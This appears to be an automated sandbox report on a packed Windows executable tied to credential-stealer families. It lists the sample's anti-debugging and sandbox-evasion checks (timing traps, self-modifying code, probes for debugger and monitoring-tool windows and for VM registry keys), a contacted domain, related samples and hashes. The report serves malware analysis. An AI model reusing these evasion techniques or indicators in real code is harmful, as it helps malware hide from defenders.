Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC0F5 second address: 5AC102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5955614996h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC102 second address: 5AC10E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F5954CE94A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC10E second address: 5AC112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC112 second address: 5AC128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC128 second address: 5AC138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F5955614996h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC138 second address: 5AC13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B056B second address: 5B056F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B056F second address: 5B0573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4974 second address: 4B4980 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jbe 00007F5955614996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BA56B second address: 5BA571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BA571 second address: 5BA575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC8DD second address: 5BC8FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F5954CE94B9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC8FC second address: 5BC928 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F595561499Eh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F595561499Ch 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push edx 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE6B4 second address: 5CE6B9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE6B9 second address: 5CE6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE809 second address: 5CE823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5954CE94A6h 0x0000000a pop esi 0x0000000b push esi 0x0000000c jno 00007F5954CE94A6h 0x00000012 pop esi 0x00000013 pop eax 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE823 second address: 5CE82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E453C second address: 5E456F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5954CE94AAh 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5954CE94B6h 0x00000015 push esi 0x00000016 jng 00007F5954CE94A6h 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E456F second address: 5E4574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E346C second address: 5E3470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E386C second address: 5E3871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E39A0 second address: 5E39BB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jo 00007F5954CE94A6h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E39BB second address: 5E39ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5955614996h 0x0000000a popad 0x0000000b pushad 0x0000000c jg 00007F5955614996h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F595561499Ch 0x00000019 popad 0x0000001a popad 0x0000001b ja 00007F59556149B6h 0x00000021 pushad 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E39ED second address: 5E39F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3DFC second address: 5E3E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3E00 second address: 5E3E33 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007F5954CE94B8h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop ecx 0x00000016 push ecx 0x00000017 push esi 0x00000018 pop esi 0x00000019 jc 00007F5954CE94A6h 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3E33 second address: 5E3E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F595561499Ah 0x00000009 jmp 00007F595561499Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3E4E second address: 5E3E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5954CE94B1h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3E6B second address: 5E3E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4220 second address: 5E422A instructions: 0x00000000 rdtsc 0x00000002 je 00007F5954CE94A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E422A second address: 5E4233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4233 second address: 5E4239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5FEA second address: 5E5FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5FF2 second address: 5E6018 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B5h 0x00000007 ja 00007F5954CE94A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6018 second address: 5E603B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007F59556149B6h 0x0000000d jmp 00007F595561499Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F5955614996h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E603B second address: 5E603F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5E38 second address: 5E5E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5E3C second address: 5E5E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5E40 second address: 5E5E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5E48 second address: 5E5E4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5E4D second address: 5E5E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F595561499Eh 0x00000011 jmp 00007F59556149A5h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5E7F second address: 5E5E89 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5954CE94ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8F49 second address: 5E8F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8F56 second address: 5E8F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8F5B second address: 5E8F9A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5955614998h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dx, cx 0x0000000e push dword ptr [ebp+122D21A4h] 0x00000014 mov dword ptr [ebp+122D31A5h], ecx 0x0000001a mov edx, eax 0x0000001c push 3F71B4CEh 0x00000021 pushad 0x00000022 pushad 0x00000023 jmp 00007F59556149A4h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA28F second address: 5EA2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5954CE94ADh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA2A7 second address: 5EA2B1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA2B1 second address: 5EA2B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA2B7 second address: 5EA2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F595561499Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA2CA second address: 5EA2CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 34CBED instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 34CCA5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 51C536 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 58143A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1292Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5648Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, file.exe, 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1496527747.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1496527747.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000EA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
Source: C:\Users\user\Desktop\file.exeFile opened: SICE
Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032DF70 LdrInitializeThunk,0_2_0032DF70
Source: file.exe, file.exe, 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping631
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
Obfuscated Files or Information		Security Account Manager2
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS223
System Information Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe100%AviraTR/Crypt.TPM.Gen
file.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://property-imper.sbs/apiC0%Avira URL Cloudsafe
https://property-imper.sbs/apiM0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
property-imper.sbs
104.21.33.116
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://property-imper.sbs/apifalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://property-imper.sbs/apiCfile.exe, 00000000.00000002.1496527747.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000EEC000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://property-imper.sbs/file.exe, 00000000.00000002.1496657784.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000EA5000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        https://property-imper.sbs/apiMfile.exe, 00000000.00000003.1495632957.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1496657784.0000000000F06000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        104.21.33.116
        		property-imper.sbsUnited States
        		13335CLOUDFLARENETUSfalse

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1561923
        Start date and time:2024-11-24 20:00:13 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 2m 47s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:2
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:file.exe
        Detection:MAL
        Classification:mal100.evad.winEXE@1/0@1/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:Failed
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Stop behavior analysis, all processes terminated

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: file.exe

        Simulations

        Behavior and APIs

        TimeTypeDescription
        14:01:20API Interceptor2x Sleep call for process: file.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        104.21.33.116file.exeGet hashmaliciousUnknownBrowse
          file.exeGet hashmaliciousUnknownBrowse
            file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
              file.exeGet hashmaliciousLummaC StealerBrowse
                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                    file.exeGet hashmaliciousLummaC StealerBrowse
                      file.exeGet hashmaliciousUnknownBrowse
                        file.exeGet hashmaliciousLummaC StealerBrowse
                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            property-imper.sbsfile.exeGet hashmaliciousUnknownBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousUnknownBrowse
                            • 172.67.162.84
                            file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                            • 172.67.162.84
                            file.exeGet hashmaliciousUnknownBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.162.84
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.162.84
                            file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.162.84
                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                            • 104.21.33.116

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 172.64.41.3
                            file.exeGet hashmaliciousUnknownBrowse
                            • 104.21.33.116
                            https://og.oomaal.in/Get hashmaliciousUnknownBrowse
                            • 172.67.183.206
                            file.exeGet hashmaliciousUnknownBrowse
                            • 172.67.162.84
                            file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                            • 172.67.162.84
                            file.exeGet hashmaliciousUnknownBrowse
                            • 104.21.33.116
                            PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 104.21.67.152
                            S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                            • 104.21.67.152
                            Outstanding Invoices_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 172.67.191.199
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.162.84

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousUnknownBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousUnknownBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousUnknownBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousUnknownBrowse
                            • 104.21.33.116

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.948952694520564
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'878'528 bytes
                            MD5:542cd6ef81cdd42518ba3baf58eb90e6
                            SHA1:b8ddd7bd3eae36806335a2c215863853c6c424f4
                            SHA256:23f4575b36961a3121fbec04b3e803e020e9dea411cce529a02e6eb658cc0f60
